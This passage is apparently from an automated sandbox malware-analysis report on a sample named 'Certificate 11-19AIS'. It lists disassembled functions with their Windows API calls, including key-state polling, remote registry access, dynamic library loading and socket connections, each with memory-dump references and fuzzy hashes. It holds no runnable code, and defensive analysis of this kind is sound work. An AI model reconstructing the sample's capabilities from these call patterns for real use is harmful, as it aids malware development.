                                                                                • Part of subcall function 007EC876: GetParent.USER32(?), ref: 007EC884
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 007ECA4E
                                                                              • EnumChildWindows.USER32(?,007ECAC4), ref: 007ECA76
                                                                              • __swprintf.LIBCMT ref: 007ECA90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                              • String ID: %s%d
                                                                              • API String ID: 3187004680-1110647743
                                                                              • Opcode ID: a8ba2e8e1de41788574492cf80776d50dd51f879fed04f6246230f09f69cef5b
                                                                              • Instruction ID: 0988582445e3895bd21366fc96d53d291948c80454c0f835783cd3787c072966
                                                                              • Opcode Fuzzy Hash: a8ba2e8e1de41788574492cf80776d50dd51f879fed04f6246230f09f69cef5b
                                                                              • Instruction Fuzzy Hash: 33118775500205BBCF12BF619C8AFE9377DAF48714F008076FE18AA142DB789546DB70
                                                                              Function 00811945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008119F3
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00811A26
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00811B49
                                                                              • CloseHandle.KERNEL32(?), ref: 00811BBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 657ca58740f655de34a8b91987d534cf3f8db6f651174900718844d451b6246a
                                                                              • Instruction ID: 7334b9223880aa48a7b81f62b130f5909f7bc2dee2b8f7490d8f0a88fa300ffe
                                                                              • Opcode Fuzzy Hash: 657ca58740f655de34a8b91987d534cf3f8db6f651174900718844d451b6246a
                                                                              • Instruction Fuzzy Hash: D0813270600214EBDF119F64C88AFADBBE9FF44720F14845DFA15AF382D7B9A9418B90
                                                                              Function 0081E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0081E1D5
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0081E20D
                                                                              • IsDlgButtonChecked.USER32(?,00000001), ref: 0081E248
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0081E269
                                                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0081E281
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ButtonCheckedLongWindow
                                                                              • String ID:
                                                                              • API String ID: 3188977179-0
                                                                              • Opcode ID: 568e1bf9a12fdb719c889d27e573993ed8050f1de874d092f2e5fc3036fee38b
                                                                              • Instruction ID: 03cee31f65778f113116dd5f2b5313765cb56bf32c0f9cdeaa48473e7d1b4890
                                                                              • Opcode Fuzzy Hash: 568e1bf9a12fdb719c889d27e573993ed8050f1de874d092f2e5fc3036fee38b
                                                                              • Instruction Fuzzy Hash: 24619A34A00608AFDB258F58C899FEA77BEFF99301F148099FD59D72A1C770A990CB10
                                                                              Function 007F1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 007F1CB4
                                                                              • VariantClear.OLEAUT32(00000013), ref: 007F1D26
                                                                              • VariantClear.OLEAUT32(00000000), ref: 007F1D81
                                                                              • VariantClear.OLEAUT32(?), ref: 007F1DF8
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007F1E26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                              • String ID:
                                                                              • API String ID: 4136290138-0
                                                                              • Opcode ID: f9ba12ce38d48e7b723dff51194fa8fad7787e955cde03c3d96e5149242b14a5
                                                                              • Instruction ID: 32f33969498130d720b13e999e1f0dec958533404f137fd6afe0eaab9ac7ea99
                                                                              • Opcode Fuzzy Hash: f9ba12ce38d48e7b723dff51194fa8fad7787e955cde03c3d96e5149242b14a5
                                                                              • Instruction Fuzzy Hash: 1E514AB5A00209EFDB14CF58D880AAAB7B8FF8C314F158559EA59DB305D334E951CFA0
                                                                              Function 00810688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 008106EE
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0081077D
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0081079B
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 008107E1
                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 008107FB
                                                                                • Part of subcall function 007CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007FA574,?,?,00000000,00000008), ref: 007CE675
                                                                                • Part of subcall function 007CE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007FA574,?,?,00000000,00000008), ref: 007CE699
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 327935632-0
                                                                              • Opcode ID: 5d419ab23d9437594b0e77f5d8b36a3ccdd4c127384401f24dd5fe8ca3cb3a5b
                                                                              • Instruction ID: ce5af871141e1a13ecad7214882b332671e6cec1f1328297eb844968de180de4
                                                                              • Opcode Fuzzy Hash: 5d419ab23d9437594b0e77f5d8b36a3ccdd4c127384401f24dd5fe8ca3cb3a5b
                                                                              • Instruction Fuzzy Hash: 60512775A00209DFCB10EFA8C889AEDB7B9FF48310B148459EA15EB351DB75AD85CF90
                                                                              Function 00812E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00813C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00812BB5,?,?), ref: 00813C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00812EEF
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00812F2E
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00812F75
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00812FA1
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00812FAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 3740051246-0
                                                                              • Opcode ID: 2266d29e2c596d7c3028111cb4322bd35356940d23aa665e96ce1f550363efa5
                                                                              • Instruction ID: 73a65a24aa892a1be11b40f7a82e20011031d347f523bbfbd9df8556efae6c5f
                                                                              • Opcode Fuzzy Hash: 2266d29e2c596d7c3028111cb4322bd35356940d23aa665e96ce1f550363efa5
                                                                              • Instruction Fuzzy Hash: DB514672208208EFD715EB64C895FAAB7F9FF88704F00881DF595872A1EB34E955CB52
                                                                              Function 0081CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a279d1425d3a46792a1dcc6c1644239ff8516c8ccd89ab54c90c79f992291767
                                                                              • Instruction ID: ec6c3923b9554fe7798edcd7e3551f473fc8d31bada492013abad76daeb906b2
                                                                              • Opcode Fuzzy Hash: a279d1425d3a46792a1dcc6c1644239ff8516c8ccd89ab54c90c79f992291767
                                                                              • Instruction Fuzzy Hash: 7441A179940248AFCB20DB68DC48FE9BB6CFF49310F140265E959E72E1C730AD91DA90
                                                                              Function 00801206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 008012B4
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 008012DD
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0080131C
                                                                                • Part of subcall function 007B936C: __swprintf.LIBCMT ref: 007B93AB
                                                                                • Part of subcall function 007B936C: __itow.LIBCMT ref: 007B93DF
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00801341
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00801349
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1389676194-0
                                                                              • Opcode ID: e6290d5a4c3dc35c2970279487a1e6ea37e3c626838eaf1d5837a675d66d517a
                                                                              • Instruction ID: 0af7c9fb86586e37381867a3f0dfb3288cd9a4795ed3be1b2651ea76dfa6fbce
                                                                              • Opcode Fuzzy Hash: e6290d5a4c3dc35c2970279487a1e6ea37e3c626838eaf1d5837a675d66d517a
                                                                              • Instruction Fuzzy Hash: 00412D35A00205DFCF01EF64C995AAEBBF5FF48314B158099E90AAB3A2CB35ED01DB50
                                                                              Function 007CB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(000000FF), ref: 007CB64F
                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 007CB66C
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 007CB691
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 007CB69F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: db48882328e29a765d99ff98b1d2bea14cba6762dbe6f086dc932a75f708fd9f
                                                                              • Instruction ID: 76de36469cf1b4943783a05a3e7059262447f54534175e522e8b899a06012678
                                                                              • Opcode Fuzzy Hash: db48882328e29a765d99ff98b1d2bea14cba6762dbe6f086dc932a75f708fd9f
                                                                              • Instruction Fuzzy Hash: 9B416A75604219FBCF159F68C845EE9BBB4FF05324F20431AF829A6290CB34A994DFA1
                                                                              Function 007EB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 007EB369
                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 007EB413
                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 007EB41B
                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 007EB429
                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 007EB431
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: f0a1bd7e556e0c83218903b18b36a9020e547c04d0ed15d2dc9d3b4a5f05ef6e
                                                                              • Instruction ID: 66cfd42fa4e79c8516fc03d74e5270001c67439dc4a91e0f45b56a0c83bebc5d
                                                                              • Opcode Fuzzy Hash: f0a1bd7e556e0c83218903b18b36a9020e547c04d0ed15d2dc9d3b4a5f05ef6e
                                                                              • Instruction Fuzzy Hash: C931DCB1901259EBDF00CFA9D94EA9E7FB5FB48319F104229F820AA1D1C3B49910CB90
                                                                              Function 007EDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 007EDBD7
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007EDBF4
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 007EDC2C
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 007EDC52
                                                                              • _wcsstr.LIBCMT ref: 007EDC5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 3902887630-0
                                                                              • Opcode ID: 43ff41ee718eff77d9eb479e4b4e42a78c6c6205d529e614f74fa49d66157298
                                                                              • Instruction ID: 5d91142a358a68640bd1b53ad22eaf82a281609d203e8c2bbec34d02f46fc760
                                                                              • Opcode Fuzzy Hash: 43ff41ee718eff77d9eb479e4b4e42a78c6c6205d529e614f74fa49d66157298
                                                                              • Instruction Fuzzy Hash: 64212C71205244BFEB255F36EC49E7B7BA9EF49750F20403DF909CA151EAA9DC01D2B0
                                                                              Function 007EBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007EBC90
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007EBCC2
                                                                              • __itow.LIBCMT ref: 007EBCDA
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007EBD00
                                                                              • __itow.LIBCMT ref: 007EBD11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 0399cdf1603926f402443d09f5201dd58c9b75a08693341094dd0d691e1d0b62
                                                                              • Instruction ID: 8dc93616f99b5966eb13bfd900b19f98dd4e6a373e74fa02cfc01b9af2ab2d21
                                                                              • Opcode Fuzzy Hash: 0399cdf1603926f402443d09f5201dd58c9b75a08693341094dd0d691e1d0b62
                                                                              • Instruction Fuzzy Hash: 8C21D47170160CBADB10AE669C8AFDF7E68AF9D310F100465FA05EB181EB788D0583A1
                                                                              Function 007F6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 007B50E6: _wcsncpy.LIBCMT ref: 007B50FA
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,007F60C3), ref: 007F6369
                                                                              • GetLastError.KERNEL32(?,?,?,007F60C3), ref: 007F6374
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007F60C3), ref: 007F6388
                                                                              • _wcsrchr.LIBCMT ref: 007F63AA
                                                                                • Part of subcall function 007F6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,007F60C3), ref: 007F63E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                              • String ID:
                                                                              • API String ID: 3633006590-0
                                                                              • Opcode ID: 5f39466d97bb15225c8c6f26d581e9cc735537d32d0daa2aa42789aa94c1208b
                                                                              • Instruction ID: 11399b72ff16d38e64a2c50192da8ecee3b915aaca81d27af8884f2d1c94aae5
                                                                              • Opcode Fuzzy Hash: 5f39466d97bb15225c8c6f26d581e9cc735537d32d0daa2aa42789aa94c1208b
                                                                              • Instruction Fuzzy Hash: BE21273190421DDBDF15AB78AC46FFA33ACEF15360F10046AF215D32C0EB68D9858A65
                                                                              Function 00808B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 0080A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0080A84E
                                                                              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00808BD3
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00808BE2
                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00808BFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 3701255441-0
                                                                              • Opcode ID: 0219afc217565f4b891440029e485dd19dc95c5a1dde0543fb07e58dda1f2b1e
                                                                              • Instruction ID: 48c2ce324a6f9a690ab8b0861deb1816f3278ec501784316b11c9f860cd41944
                                                                              • Opcode Fuzzy Hash: 0219afc217565f4b891440029e485dd19dc95c5a1dde0543fb07e58dda1f2b1e
                                                                              • Instruction Fuzzy Hash: 11216D312002189FDB50AB68DD89F7E77A9FF88720F044859F956EB2D2CE74A8418B61
                                                                              Function 00808420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00808441
                                                                              • GetForegroundWindow.USER32 ref: 00808458
                                                                              • GetDC.USER32(00000000), ref: 00808494
                                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 008084A0
                                                                              • ReleaseDC.USER32(00000000,00000003), ref: 008084DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
